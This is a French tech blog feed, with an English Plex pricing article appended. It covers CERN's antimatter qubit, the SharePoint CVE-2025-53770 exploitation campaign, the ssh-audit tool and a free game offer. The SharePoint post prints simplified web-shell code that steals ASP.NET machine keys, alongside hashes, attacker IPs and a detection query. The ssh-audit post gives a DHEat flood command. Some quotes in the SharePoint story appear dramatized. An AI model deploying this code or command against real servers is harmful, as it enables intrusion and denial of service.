Les scientifiques du CERN ont encore frappé fort car après nous avoir fait flipper les complotistes avec leur collisionneur de particules qui devait créer des trous noirs miniatures qui nous avaleraient tout rond, ils viennent de fabriquer un truc encore plus chelou : un qubit d’antimatière.

Pour ceux qui ont séché les cours de physique, l’antimatière c’est comme la matière normale, mais en version “miroir maléfique”. Quand une particule de matière rencontre son équivalent en antimatière, pouf, elles s’annihilent mutuellement en libérant une quantité d’énergie monstrueuse. C’est pour ça que dans Star Trek, ils utilisent ça pour faire avancer l’Enterprise.

Cette bonne nouvelle nous vient de l’équipe de Barbara Latacz qui a réussi à maintenir un antiproton (l’équivalent antimatiériel du proton) dans un état quantique stable pendant 50 secondes. 50 secondes, ça peut paraître court, mais dans le monde de l’antimatière, c’est comme si vous aviez réussi à garder une bulle de savon intacte pendant une semaine.

Pour y arriver, ils ont utilisé une technique appelée “spectroscopie de transition quantique cohérente” (ouais, je sais, ça fait nom de sortilège dans Harry Potter). En gros, ils ont piégé l’antiproton dans un champ électromagnétique super sophistiqué appelé piège de Penning, et ils ont réussi à le faire osciller entre deux états quantiques, comme un pendule qui balance entre “haut” et “bas”.

La physicienne Barbara Latacz raconte d’ailleurs qu’elle a immédiatement ouvert une bouteille de champagne quand ils ont réussi, et après 5 ans de boulot acharné sur ce projet, elle l’avait bien mérité.

Mais alors pourquoi c’est si important ??? Eh bien figurez-vous que l’un des plus grands mystères de la physique, c’est de comprendre pourquoi notre univers est fait principalement de matière alors que théoriquement, il devrait y avoir autant de matière que d’antimatière. C’est comme si vous lanciez un million de pièces de 1 euros en l’air et qu’elles tombaient toutes sur face… statistiquement, c’est louche.

Cette expérience nommée BASE (Baryon Antibaryon Symmetry Experiment, pour ceux qui aiment les acronymes) permet justement d’étudier les propriétés de l’antimatière avec une précision jamais atteinte. En comparant le comportement des antiprotons avec celui des protons normaux, les scientifiques espèrent trouver une petite différence, un truc qui cloche, et qui expliquerait pourquoi on est là au lieu d’avoir été annihilés il y a 13,8 milliards d’années.

Stefan Ulmer, le porte-parole du projet BASE, explique que cette première mondiale ouvre la voie à l’application de toute une panoplie de méthodes de spectroscopie cohérente sur des systèmes de matière et d’antimatière. En gros, ils viennent de débloquer un nouveau niveau dans le jeu de la physique des particules.

Toutefois, avant que vous ne commenciez à fantasmer sur des ordinateurs quantiques à base d’antimatière (avouez, vous y avez pensé bande de coquins !), sachez que pour l’instant, c’est complètement irréaliste car produire et stocker de l’antimatière, c’est tellement compliqué et coûteux que ça n’a aucun sens pour faire de l’informatique quantique. Les qubits normaux font très bien le job, merci.

Par contre, ce qui est vraiment excitant, c’est le futur upgrade prévu : BASE-STEP. Cette nouvelle version permettra de transporter les antiprotons par camion (oui oui !) vers des environnements magnétiques plus calmes que l’usine à antimatière du CERN. L’équipe espère ainsi pouvoir maintenir la cohérence quantique pendant 10 fois plus longtemps, ce qui pourrait révolutionner notre compréhension de l’antimatière.

Bref, pendant que certains s’écharpent sur X pour savoir si les pâtes se cuisent avec ou sans couvercle, d’autres créent des qubits d’antimatière et percent les mystères de l’univers. Et ça, ça me redonne (un peu) foi en l’humanité.

Source

Allez, même si tous les médias vous gavent avec ça ces derniers jours, je vais quand même vous raconter l’histoire de la CVE-2025-53770, une faille SharePoint qui fait actuellement trembler Internet.

On est le 18 juillet dernier, c’est vendredi matin. Je suis tranquille posé en Bretagne, devant mon petit café, en train de scroller mes flux RSS comme d’hab. Et là, BAM ! Je vois un tweet d’un chercheur néerlandais qui me fait recracher mon café : “Quelque chose de très mauvais se passe avec SharePoint. Vérifiez vos logs. MAINTENANT.”

Du coup, je me dis “encore un qui a fumé la moquette”. Mais non. C’était le début d’une histoire qui commence avec un mec vietnamien super balèze, qui continue avec des hackers chinois vénères, et qui se finit avec des milliers d’entreprises qui chialent…

Mais pour vraiment comprendre ce bordel actuel, faut qu’on remonte le temps. Direction Berlin, mai 2025 pour le Pwn2Own. Cet événement, c’est LE truc où les meilleurs hackers du monde viennent casser du code pour de la thune. Les Jeux Olympiques du hacking si vous préférez, mais en plus stylé et sans le dopage. Dans la salle bondée, y’a un jeune vietnamien qui se pointe avec son laptop tout pourri. Son nom est Dinh Ho Anh Khoa, alias @_l0gg sur Twitter.

Le mec bosse pour Viettel Cyber Security, et c’est pas son premier rodéo mais cette fois, il a un truc de malade dans sa besace. Pendant des mois, ce génie a étudié SharePoint, vous savez, le machin de Microsoft que toutes les boîtes utilisent pour stocker leurs docs et faire semblant d’être organisées.

Et là, attention les yeux, en quelques minutes, Khoa déboîte complètement un serveur SharePoint. Sans mot de passe, sans rien. Juste avec UNE SEULE requête HTTP. Mdr ! Le jury n’en peut plus, et les autres participants sont sur le cul.

Comment a-t-il fait ? Et bien c’est simple (enfin, façon de parler). Il enchaîne deux bugs :

• Le premier (CVE-2025-49706) qui dit “Salut SharePoint, c’est moi ton admin, laisse-moi passer” et SharePoint le croit !
• Le second (CVE-2025-49704) qui permet d’écrire des fichiers où on veut sur le serveur

Résultat des courses, 100 000 dollars dans la popoche, 10 points Master of Pwn, et une standing ovation !! L’équipe Viettel finit alors avec un score parfait de 15,5/15,5. Ils sont deuxièmes au général, mais franchement, c’est la classe.

Plus tard, Khoa tweete avec la modestie d’un champion : “L’exploit nécessite une seule requête. Je l’appellerais ToolShell, ZDI a dit que l’endpoint était /ToolPane après tout.” Le mec vient de péter SharePoint et il fait des jeux de mots. J’adore.

SharePoint en PLS face à l’exploit de Khoa

Bon, maintenant on fait un petit saut dans le temps. On est le 14 juillet et Microsoft a sorti des patchs pour ces deux vulnérabilités. Tout le monde pense que c’est réglé. Spoiler alert : c’est pas réglé du tout.

Dans les bureaux de Code White GmbH en Allemagne, l’ambiance est électrique car les mecs viennent de faire un truc de ouf ! Ils ont reproduit l’exploit de Khoa et pas qu’un peu !

“Nous avons reproduit ‘ToolShell’, la chaîne d’exploit non authentifiée pour CVE-2025-49706 + CVE-2025-49704 utilisée par @_l0gg pour faire tomber SharePoint à #Pwn2Own Berlin 2025, c’est vraiment juste une requête !”, postent-ils sur Twitter, tout fiers.

Sauf que voilà, Code White c’est des gentils, mais dans l’ombre, y’a des méchants qui prennent des notes. Et eux, ils ne vont pas se contenter de twitter leur exploit…

Amsterdam, 18 juillet, 20h47. Les mecs d’Eye Security, une boîte néerlandaise spécialisée dans la détection de menaces, sont en train de surveiller Internet (ouais, c’est leur taf, surveiller TOUT Internet…). Un de leurs analystes lève la tête de son écran : “Euh les gars, j’ai des centaines de requêtes POST bizarres vers /layouts/15/ToolPane.aspx sur plein de serveurs SharePoint différents. Et le header Referer c’est /layouts/SignOut.aspx. C’est complètement con comme truc.”

Bah oui c’est con. Personne ne se déconnecte via ToolPane. C’est comme si on passait par la fenêtre pour sortir de chez soit alors que la porte est ouverte. Sauf que là, c’est pas pour sortir, c’est pour rentrer…

L’équipe d’Eye Security vient alors de découvrir en live une des plus grosses campagnes de cyberattaque de l’histoire. Ce qu’ils voient, c’est l’exploitation d’une NOUVELLE vulnérabilité zero-day : la CVE-2025-53770. Les hackers ont trouvé comment contourner les patchs de Microsoft. C’est un game over total.

Les chercheurs bossent alors toute la nuit comme des malades. Ils scannent plus de 8000 serveurs SharePoint dans le monde et le constat est terrifiant :

• 17 juillet, 12h51 UTC : Première vague depuis 96.9.125.147 (des tests apparemment)
• 18 juillet, 18h06 UTC : LA GROSSE VAGUE depuis 107.191.58.76 (ça cartonne sévère)
• 19 juillet, 07h28 UTC : Rebelote depuis 104.238.159.149

“C’était comme regarder un tsunami en temps réel”, racontera quelques jours plus tard un chercheur. “On voyait des dizaines de serveurs tomber toutes les heures. Et on pouvait rien faire à part regarder et prendre des notes.”

Mais alors qu’est-ce que les hackers déploient sur ces serveurs ? Et bien un truc très vicieux nommé spinstall0.aspx. Derrière ce nom tout pourri se cache une backdoor d’une ingéniosité diabolique car contrairement aux web shells classiques qui vous permettent d’exécuter des commandes (genre “del C:*.*” pour les nostalgiques du DOS), spinstall0.aspx n’a qu’UN SEUL but : voler les clés cryptographiques du serveur SharePoint.

Pour les non-techos, j’vous explique. Les clés crypto de SharePoint, c’est comme le moule pour fabriquer un pass pour votre immeuble. Une fois que vous avez le moule de ce pass, vous pouvez faire autant de doubles que vous voulez et même si le proprio d’un appart change sa serrure, vous avez toujours le moule pour faire des pass, donc vous pouvez l’ouvrir.

Techniquement, ça ressemble à ça (version simplifiée pour pas vous faire peur) :

// spinstall0.aspx - Le cauchemar de tout admin SharePoint
using System.Web;
using System.Reflection;
// On charge les trucs secrets de Windows
Assembly assembly = Assembly.Load("System.Web");
// On utilise la magie noire de la réflexion .NET
MethodInfo getConfig = assembly.GetType("System.Web.Configuration.MachineKeySection")
.GetMethod("GetApplicationConfig", BindingFlags.NonPublic | BindingFlags.Static);
// On pique les clés crypto
MachineKeySection config = (MachineKeySection)getConfig.Invoke(null, null);
// Et hop, on les affiche tranquille
Response.Write("ValidationKey: " + config.ValidationKey);
Response.Write("DecryptionKey: " + config.DecryptionKey);
// Bisous, on se revoit plus tard avec vos clés ;)

Les chercheurs de Check Point ont identifié les signatures SHA256 du malware (pour ceux qui veulent jouer aux détectives) :

• 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514
• 27c45b8ed7b8a7e5fff473b50c24028bd028a9fe8e25e5cea2bf5e676e531014
• 8d3d3f3a17d233bc8562765e61f7314ca7a08130ac0fb153ffd091612920b0f2

Et le fichier est généralement planqué ici :

C:\PROGRA~1\COMMON~1\MICROS~1\WEBSER~1\16\TEMPLATE\LAYOUTS\spinstall0.aspx

Hé oui, ils utilisent encore les noms courts DOS. En 2025, c’est ça le niveau expert !

22 juillet, Redmond, Washington. Vous vous en doutez, chez Microsoft c’est la panique totale. Le MSRC (Microsoft Security Response Center) est en mode DEFCON 1 et les mecs dorment plus et ne mangent plus…non, ils codent et analysent H24 tout ce qui se passe.

Et là, les analystes du Microsoft Threat Intelligence font une découverte qui fout les jetons… Ce ne sont pas des script kiddies qui attaquent. C’est carrément des groupes étatiques chinois. Du lourd. Du très lourd.

Microsoft identifie ainsi 3 acteurs principaux (ils leur donnent des noms de typhons, c’est plus classe que “Hacker Chinois N°3”) :

Linen Typhoon (alias APT27 ou Emissary Panda) : Ces mecs sont dans le game depuis 2012 et leur spécialité c’est de voler de la propriété intellectuelle. Ils adorent taper dans les ambassades et les organisations gouvernementales. Bref, ils veulent savoir ce que tout le monde mijote.

Violet Typhoon : Apparus en 2015, ces gars ciblent les anciens militaires, les ONG, les think tanks et les universités. Et leur kiff c’est de collecter du renseignement. Ils veulent savoir qui pense quoi et qui fait quoi.

Storm-2603 : Ce sont les plus mystérieux du lot. Basés en Chine mais sans liens connus avec d’autres groupes, ces mecs déploient parfois des ransomwares Warlock et Lockbit. Il sont mi-espions, mi-rançonneurs. Dans le pire des deux mondes, quoi.

“C’est la première fois qu’on voit 3 groupes d’État-nation différents exploiter la même zero-day en même temps”, confie un analyste Microsoft. “D’habitude ils se marchent sur les pieds, là ils étaient coordonnés. C’est flippant.”

19 juillet, minuit. Chez Microsoft c’est toujours la course contre la montre car chaque heure qui passe, c’est des dizaines de nouveaux serveurs pwned. La pression est énorme. Les devs sont s, les managers pètent des câbles, et le PDG appelle toutes les heures. Le problème est complexe car la CVE-2025-53770 c’est pas juste un bug, c’est un contournement des patchs précédents.

L’équipe SharePoint bosse alors sur plusieurs fronts :

1. Comprendre comment le contournement fonctionne (spoiler : c’est tordu)
2. Développer un patch qui ne peut pas être contourné (cette fois promis juré ^^)
3. Tester sur TOUTES les versions de SharePoint (y’en a un paquet !)
4. Et préparer la doc et les outils (parce que personne lit jamais la doc mais bon…)

Mais pendant ce temps, les chiffres des compromissions explosent. The Washington Post rapporte que des agences fédérales US, des compagnies énergétiques, des universités prestigieuses et même des opérateurs télécom asiatiques se sont fait avoir. C’est le carnage total !!

20 juillet, dimanche matin. Microsoft fait un truc qu’ils ne font jamais : sortir des patchs un dimanche. Mais là c’est la guerre, alors il faut agir vite.

Et ils balancent tout d’un coup :

• Un advisory officiel qui explique le bordel
• Des patchs d’urgence pour toutes les versions (même les vieilles que personne devrait plus utiliser)
• Une requête KQL pour détecter le malware dans Microsoft 365 Defender

Voici la requête KQL pour les curieux :

DeviceFileEvents 
| where FolderPath has "MICROS~1\\WEBSER~1\\16\\TEMPLATE\\LAYOUTS" 
| where FileName =~ "spinstall0.aspx" or FileName has "spinstall0"
| project Timestamp, DeviceName, InitiatingProcessFileName, 
InitiatingProcessCommandLine, FileName, FolderPath, 
ReportId, ActionType, SHA256
| order by Timestamp desc
// Si ça retourne des résultats, vous êtes dans la mouise

Mais Microsoft va plus loin car dans leur advisory, ils lâchent une bombe : “Appliquer les patches ne suffit pas. Vous DEVEZ changer vos clés ASP.NET et redémarrer IIS.”

Traduction : même si vous patchez, si les hackers ont déjà volé vos clés, vous êtes toujours dans la merde. Il faut donc tout changer… Les serrures ET les clés.

Le même jour, la CISA américaine ajoute la CVE-2025-53770 à sa liste des vulnérabilités activement exploitées. Les agences fédérales ont alors 24h pour patcher. Pour une administration, c’est comme demander à un escargot de courir un 100m. Et puis surtout c’est trop tard car le 21 juillet, des proof-of-concept apparaissent sur GitHub. N’importe quel gamin avec 2 neurones peut maintenant exploiter la faille. C’est Noël pour les script kiddies.

SentinelOne rapporte même que leurs honeypots (des faux serveurs pour attraper les hackers) détectent des MILLIERS de tentatives par heure. C’est l’apocalypse numérique. SOCRadar balance aussi des chiffres qui font mal. Et un simple scan Shodan révèle l’exposition mondiale :

• États-Unis : 3 960 serveurs exposés (champions du monde !)
• Iran : 2 488 serveurs (même sous sanctions ils ont SharePoint)
• Malaisie : 1 445 serveurs (la surprise du chef)
• Pays-Bas : 759 serveurs (ils hébergent tout le monde)
• Irlande : 645 serveurs (les datacenters européens)

Au total, plus de 16 000 serveurs SharePoint sont exposés sur Internet et 8 000 sont vulnérables. Des banques, des hôpitaux, des gouvernements… Tout le monde y passe. Rapid7 sort également une analyse qui fait froid dans le dos : certaines organisations se sont fait compromettre en moins de 4 MINUTES après exposition. 4 minutes ! C’est le temps de se faire un café et boom, c’est hacké.

Alors qu’est-ce qu’on retient de ce bordel monumental ? Et bien plusieurs trucs importants :

1. La vitesse, c’est la vie : Entre le PoC de Code White (14 juillet) et l’exploitation massive (17 juillet), y’a que 3 jours. Dans le monde moderne, on n’a pas des semaines pour patcher. Ce sont des heures, max.
2. Les hackers innovent car voler les clés crypto au lieu d’installer un shell, c’est très malin. Ça montre que les attaquants pensent long terme car ils ne veulent pas juste entrer, ils veulent rester.
3. C’est de la géopolitique cyber car 3 groupes chinois qui bossent ensemble c’est du jamais vu encore. Le cyberespace est devenu un vrai champ de bataille entre les nations et nous, les couillons, on est au milieu.
4. Et surtout, les patchs c’est pas magique : La CVE-2025-53770 était un contournement des patchs précédents ce qui montre qu’installer les mises à jour c’est bien, mais c’est pas suffisant. Il faut aussi une défense en profondeur à savoir des patchs + du monitoring + de la segmentation + de nombreuses prières.

Et l’histoire n’est pas finie car pendant que j’écris ces lignes, des milliers d’organisations vérifient leurs logs en mode panique. Elles appliquent les patchs, changent leurs clés, et prient pour pas être dans la liste des victimes. Dinh Ho Anh Khoa, notre hacker vietnamien du début a même déclaré : “J’aurais jamais imaginé que ma découverte aurait de telles conséquences. Mon but c’était d’améliorer la sécurité, pas de déclencher une cyberguerre mondiale.”

Te tracasse pas trop mon gars, ça aurait fini par arriver de toute manière… Là au moins, on est au courant. Et surtout Microsoft a annoncé des changements majeurs dans SharePoint : Plus d’audits, une meilleure séparation des privilèges, et tout le tralala. On verra si ça suffit pour la prochaine fois.

Voilà, c’est ça Internet… On est tous connectés pour le meilleur et surtout pour le pire… Donc si vous bossez dans l’IT et que vous avez SharePoint, allez vérifier vos logs. Genre maintenant hein. Tout de suite là. Et changez vos clés crypto aussi. On sait jamais.

À bon entendeur !

Sources : The Hacker News - Microsoft Links Ongoing SharePoint Exploits to China State Actors, The Hacker News - CISA Orders Urgent Patching After SharePoint Zero-Day, Microsoft Security Blog - Disrupting Active Exploitation, Eye Security - SharePoint Under Siege, MSRC - Customer Guidance, CISA - CVE-2025-53770 Added to Catalog

Vous saviez qu’il était possible de crasher SSH avec seulement 31 KB/s de trafic ? Hé oui, c’est carrement possible avec l’attaque DHEat, une vulnérabilité vieille de 20 ans qui fait encore des ravages et pourtant, personne n’en parle… Alors aujourd’hui, on va voir comment tester et sécuriser vos serveurs SSH.

SSH-Audit c’est un outil open source qui analyse vos serveurs (et même vos clients SSH) pour détecter tous les problèmes de configuration. Algorithmes obsolètes, vulnérabilités connues, mauvaises pratiques… rien ne lui échappe. Le truc cool, c’est qu’il ne se contente pas de vous balancer des erreurs à la figure. Non, non, il vous explique vraiment pourquoi c’est dangereux et vous propose des solutions concrètes.

Pour l’installer, c’est super easy. Si vous êtes team Python, un simple

pip3 install ssh-audit

et c’est réglé. Et si vous préférez Docker ?

docker pull positronsecurity/ssh-audit

et vous êtes prêt.

Et pour les adeptes de Snap,

snap install ssh-audit

fera le job. Bref, ils ont pensé à tout le monde.

Mais attendez, c’est pas fini puisque SSH-Audit intègre maintenant des tests pour les vulnérabilités les plus récentes. Vous avez entendu parler de l’attaque Terrapin (CVE-2023-48795) ? Cette saleté permet de compromettre l’intégrité du canal SSH en tronquant des messages. Et le pire c’est que 77% des serveurs SSH sur Internet y sont vulnérables. Donc c’est super car SSH-Audit détecte ça en deux secondes et vous dit exactement quoi faire pour vous protéger.

Et ssh-audit ne fait pas que scanner. Il peut carrément simuler des attaques pour tester la résistance de vos serveurs. L’attaque DHEat dont je parlais au début ? Vous pouvez la lancer avec la commande

ssh-audit --dheat=10 targetserver

Ça utilise 10 connexions simultanées pour saturer le CPU du serveur cible. C’est violent mais c’est exactement ce que ferait un attaquant donc mieux vaut découvrir la faille vous-même plutôt que de la laisser à un script kiddie, non ?

Et pour les pros qui gèrent des parcs de serveurs, ssh-audit propose un mode “politique” vraiment malin où au lieu de scanner bêtement, vous définissez une configuration de référence et l’outil vérifie que tous vos serveurs s’y conforment.

Par exemple, si vous voulez que tous vos serveurs Ubuntu 22.04 respectent les dernières recommandations de sécurité, vous pouvez créer une politique avec

ssh-audit -M ma_politique.txt serveur_reference

et l’appliquer partout avec

ssh-audit -P ma_politique.txt serveur_a_tester

D’ailleurs en parlant de ça, l’outil détecte aussi tous les algorithmes qui ne sont pas résistants aux attaques quantiques. En suivant le principe du “Harvest Now, Decrypt Later”, les agences de renseignement stockent déjà vos communications chiffrées en attendant d’avoir des ordinateurs quantiques pour les déchiffrer. SSH-Audit vous alerte sur ces algorithmes vulnérables pour que vous puissiez migrer vers des alternatives quantum-safe.

L’utilisation basique, permet aussi de scanner votre serveur :

ssh-audit monserveur.com

Et pour tester un client SSH (super utile pour vérifier que vos devs utilisent des configs sécurisées), lancez ssh-audit -c et connectez-vous avec ssh -p 2222 test@localhost. L’outil analysera la configuration du client qui se connecte.

Ah et j’oubliais un truc important. Si vous n’avez pas envie de jouer avec la ligne de commande, il y a une interface web sur ssh-audit.com. Vous entrez l’IP de votre serveur et hop, vous avez un rapport détaillé. C’est pratique pour faire un test rapide ou pour montrer à votre boss pourquoi il faut absolument mettre à jour les serveurs.

Voilà, donc si vous gérez des serveurs SSH (et qui n’en gère pas de nos jours ?), ssh-audit devrait faire partie de votre boîte à outils. C’est gratuit, c’est open source, et ça peut littéralement vous sauver les fesses en détectant des vulnérabilités critiques avant qu’elles soient exploitées. Donc faites-vous une faveur et testez vos serveurs maintenant. Vous me remercierez quand vous découvrirez que votre serveur de prod utilise encore des algos SHA-1 ou qu’il est vulnérable à DHEat !

Et si vous voulez aller plus loin, jetez un œil aux guides de durcissement fournis par l’équipe de ssh-audit. Ils expliquent étape par étape comment sécuriser OpenSSH, Dropbear et d’autres implémentations SSH.

Car comme dirait votre psy, détecter les problèmes c’est bien, mais les corriger c’est encore mieux !

Bon, j’ai une super nouvelle pour les fans de stratégie et ceux qui cherchent un nouveau jeu chronophage : Epic Games Store balance enfin du lourd pour son Summer Sale 2025 en offrant Civilization VI Platinum Edition gratuitement ! Et attention, l’offre se termine le 24 juillet à 17h (heure française), donc faut pas traîner.

Et le plus cool, c’est qu’ils n’offrent pas juste le jeu de base comme en 2020. Non non, là c’est la version Platinum complète avec toutes les extensions majeures et 6 packs de DLC. Valeur normale : 80 dollars. Et là c’est gratuit. Zéro. Nada. C’est Noël en juillet !

Pour ceux qui vivent dans une grotte, Civilization VI c’est LE jeu de stratégie 4X par excellence. Les 4X c’est quoi ? eXplore, eXpand, eXploit, eXterminate. En gros, vous prenez une civilisation de l’âge de pierre avec juste un colon et un guerrier, et vous la guidez jusqu’à l’ère spatiale. Ou jusqu’à la domination mondiale. Ou jusqu’à une victoire culturelle. Bref, vous avez le choix.

Le truc avec Civ VI, c’est que c’est addictif comme pas permis. C’est le genre de jeu où vous vous dites “allez, encore un tour” et hop, vous levez la tête, il est 4h du mat et vous n’avez plus de café. Mais quelle satisfaction quand votre empire s’étend sur trois continents et que Gandhi vous menace avec ses bombes nucléaires (oui, c’est un des running gag de la série). Comme tous les Civ, cet opus reste une référence absolue du genre.

Ah et j’oubliais les 6 packs de civilisations inclus ! Vikings menés par Harald Hardrada, la Pologne de Jadwiga, l’Australie avec John Curtin, la Perse de Cyrus, la Macédoine d’Alexandre le Grand, la Nubie d’Amanitore, et enfin le Khmer et l’Indonésie. Chaque civilisation a ses propres unités, bâtiments uniques et bonus qui changent complètement votre façon de jouer.

Le gameplay de Civ VI est hyper profond sans être inaccessible et la grande nouveauté par rapport aux anciens Civ, c’est le système de districts. Au lieu d’empiler tous vos bâtiments dans le centre-ville, vous devez construire des quartiers spécialisés autour : campus pour la science, théâtre pour la culture, zone industrielle pour la production, etc. Ça ajoute une dimension puzzle super intéressante où le placement de vos villes devient crucial.

Vous devez aussi jongler avec 2 arbres de progression : les technologies classiques (de la roue aux robots géants de la mort) et l’arbre des dogmes sociaux qui débloque des gouvernements, des politiques et des bonus culturels. Chaque techno a également son moment “Eureka”, une mini-quête qui accélère la recherche. Genre construire une ville côtière pour booster la navigation…etc.

Pour les débutants qui flipperaient devant la complexité, pas de panique, puisque le jeu a un tutoriel intégré super bien fait et surtout la Civilopedia, une encyclopédie in-game qui explique absolument tout. C’est le gros point d’interrogation en haut de l’écran, votre meilleur ami pour comprendre les mécaniques.

Allez, je vais quand même vous donner quelques conseils de base pour bien démarrer : installez votre première ville près de l’eau fraîche (rivière, lac, oasis) pour le housing qui limite votre croissance de population. Explorez rapidement avec votre éclaireur pour trouver des villages tribaux (bonus gratuits), des merveilles naturelles et des cités-états. Et surtout, développez plusieurs villes rapidement plutôt qu’une seule mégalopole.

Le jeu propose 5 conditions de victoire, donc vous avez vraiment le choix de votre style. Domination militaire en conquérant toutes les capitales, victoire scientifique en partant coloniser Mars, victoire culturelle en devenant LA destination touristique mondiale, victoire religieuse en convertissant le monde entier, ou victoire diplomatique en gagnant des points au congrès mondial.

Bon par contre, petite déception pour certains, c’est uniquement pour Windows sur Epic. Pas de version Mac ou Linux dans cette offre. Et attention aussi, le New Frontier Pass qui ajoute encore plus de civilisations et de modes de jeu n’est pas inclus, c’est vendu séparément mais pour du gratuit, on va pas faire la fine bouche.

C’est quand même cool de voir que le jeu continue d’être supporté en 2025. Aspyr a sorti une grosse mise à jour en juin pour la version Android avec des pools de leaders personnalisables et Jules César comme nouveau leader pour Rome. Et même avec la sortie de Civilization VII, le VI reste ultra actif avec une communauté de moddeurs dingue.

Pour récupérer votre copie gratuite, c’est simple : foncez sur l’Epic Games Store avant le 24 juillet 11h ET (17h heure française). Cherchez Civilization VI Platinum Edition dans la section jeux gratuits, cliquez sur “Obtenir”, et c’est dans la poche. Sinon, vous cliquez ici, ce sera encore plus rapide ^^.

Une fois dans votre bibliothèque, c’est à vie, même si vous l’installez dans 3 ans.

Petite astuce, même si vous avez déjà le jeu de base (sur Steam par exemple), ça vaut quand même le coup de le chopper sur Epic pour les extensions car Rise and Fall et Gathering Storm coûtent encore cher vendues séparément, donc c’est vraiment une affaire en or.

Je vous préviens quand même juste, préparez-vous à perdre des heures de sommeil car ce truc est plus addictif que de manger des chips devant Netflix. Mais quel kiff !

Alors foncez, c’est vraiment LE bon plan gaming de la semaine. Et si vous hésitez, encore une fois, c’est gratuit et surtout, ça tourne sur des configs modestes (une HD 7970 de 2012 suffit) donc ne vous privez pas !

Source

La nouvelle série française, avec Isabelle Adjani, cartonne actuellement sur Netflix depuis sa sortie, le 9 juillet 2025. Si vous avez déjà dévoré ces 6 épisodes remplis de suspense, voici 4 séries comme Soleil Noir à découvrir en streaming.

Source

Vous aussi vous avez déjà passé 10 minutes à retaper ligne par ligne un bout de code trouvé dans un screenshot de Stack Overflow ?

Félicitations, vous faites partie du club des masochistes cyber-digiteaux ! Heureusement, je vous ai trouvé le remède miracle : NormCap, un petit outil qui capture directement le texte au lieu de faire des images inutiles.

Au lieu de prendre une capture d’écran classique qui vous donnera une image à stocker quelque part, NormCap utilise l’OCR (reconnaissance optique de caractères) pour extraire directement le texte. Vous sélectionnez une zone de votre écran, et hop, le texte se retrouve dans votre presse-papiers, prêt à être collé où vous voulez.

Vous savez ce qui m’énerve plus que les développeurs qui utilisent “!important” sur chaque ligne de leur CSS ?

Ce sont les website builders qui vous arnaquent avec leurs “plans gratuits” bourrés de pubs. Mais heureusement, Mozilla a sorti en fin d’année dernière Solo, un créateur de sites IA qui vous offre VRAIMENT tout gratis, domaine personnalisé inclus. L’organisation derrière Firefox s’attaque donc frontalement au marché des “constructeurs de site web” dominé par Wix (1,76 milliard de dollars de revenus en 2024) et Squarespace (1,01 milliard en 2023).

Source

Is This The Beginning of the End of PLEX – Is It Jellyfin Time?

After more than a decade of keeping its Lifetime Plex Pass at $119.99, Plex has officially announced a significant price increase—raising the cost to $249.99 starting April 29, 2025. This announcement, delivered through a press release on March 19, also outlined several additional changes to Plex’s pricing structure and feature availability. While price increases are common in the subscription space, this is Plex’s first major change of its kind in over ten years. It affects not just future subscribers, but the entire conversation around personal media platforms and the value Plex provides in 2025. As someone who has tested and covered Plex across various NAS platforms over the years, I think it’s important to break this all down clearly—and fairly.

Note – at the time of writing, April 5th, the old prices from Plex Pass are still available and a Lifetime Plex Pass purchased now will be no different than one purchased after April 29th 2025)

The TL;DR – Plex Just Raised Prices and Paywalled Remote Streaming

Plex is doubling the price of its Lifetime Pass from $119.99 to $249.99 starting April 29, 2025—its first increase in over a decade. At the same time, remote streaming will no longer be free, now requiring either a Plex Pass or a new $1.99/month Remote Watch Pass. While Plex has removed mobile app unlock fees and teased new features like a Common Sense Media integration, users are frustrated that core features are being moved behind paywalls. Open-source alternatives like Jellyfin are gaining traction, though they lack Plex’s polish and easy remote access. Emby sits awkwardly between the two, offering both paid and free tiers but without a clear value advantage. If you’re a regular Plex user, now is likely the last chance to grab the Lifetime Pass at its original price—after that, the equation changes.

Why is PLEX Increasing Prices and Changing their Software Services?

Plex has positioned this move as a necessary step toward long-term sustainability and innovation, citing rising infrastructure and development costs. Alongside the new Lifetime price, the monthly subscription will increase to $6.99 (up from $4.99), and the annual plan will rise to $69.99 (from $39.99). That’s a considerable leap across the board. If you’re currently on the fence about investing in a Lifetime Pass, the window is closing quickly. I’ve said it before and I’ll say it again—if Plex is part of your day-to-day setup, especially with multiple users or remote access needs, now is the most sensible time to act. Once the new pricing kicks in, the Lifetime tier may lose its appeal for newer users, especially when compared to other one-time license models in the tech space.

More controversial than the price hike, though, is the newly introduced limitation on remote streaming. As of late April, remote access will no longer be included in the free version of Plex. This means that if you want to stream media from your home server while away—say on a mobile device or at work—you’ll now need a Plex Pass or a new tier called Remote Watch Pass, which is priced at $1.99/month or $19.99/year. This shift marks a pretty significant change in Plex’s philosophy. Previously, you could set up a NAS, install Plex Media Server, and stream remotely with minimal friction. Now, that experience is essentially paywalled. While the company has clarified that users with an existing Plex Pass won’t be affected, new users and guests who rely on remote access will need to consider this new fee model.

In his own coverage of the news, Alex from the KTZ Systems YouTube channel offered a measured but critical response. He highlighted the underlying tension many feel: “You’re paying Plex to access your own files, on your own hardware, over your own network and internet connection.” It’s a fair point—and while I can understand Plex’s need for sustainable revenue, the optics of charging for what many considered a core, previously-free feature are less than ideal. In our recent joint podcast, Alex and I both agreed that if Lifetime Passes are no longer financially viable, Plex should have either phased them out or significantly increased the cost to signal their rarity. Instead, the $249.99 price tag sits in an odd middle ground—too high to feel like a deal, too low to feel truly premium.

(From official Plex Pages) IMPORTANT NOTE FOR CURRENT PLEX PASS HOLDERS:
For users who have an active Plex Pass subscription, remote playback will continue to be available to you without interruption from any Plex Media Server, after these changes go into effect. When running your own Plex Media Server as a subscriber, other users to whom you have granted access can also stream from the server (whether local or remote), without ANY additional charge—not even a mobile activation fee.

Could PLEX Have Approached Funding and Sustainability Better?

Rather than placing long-standing features behind a paywall, Plex had several other options for becoming more financially sustainable—many of which were discussed across the community in recent weeks:

• Introduce a “Plex 2.0” Premium Tier: Instead of retroactively limiting features, Plex could have rolled out a major version update with enhanced capabilities—such as native audiobook support, advanced download controls, or multi-user analytics—reserved for paying users, while leaving existing features intact for legacy users.

• Cap Lifetime Passes and Shift Focus to Recurring Tiers: Rather than awkwardly doubling the Lifetime price, Plex might have opted to discontinue Lifetime entirely and focus on expanding the value of annual/monthly subscriptions through regular feature rollouts or exclusive integrations, as seen in platforms like Roon or UnRAID.

• Use a “Freemium Scaling” Model: By allowing remote access for a limited number of external users or devices on the free tier (e.g., “first one’s free”), Plex could have maintained goodwill while encouraging heavier users to upgrade organically—similar to how many SaaS platforms incentivize scaling through added value, not restriction.

What Else is Changing in Plex?

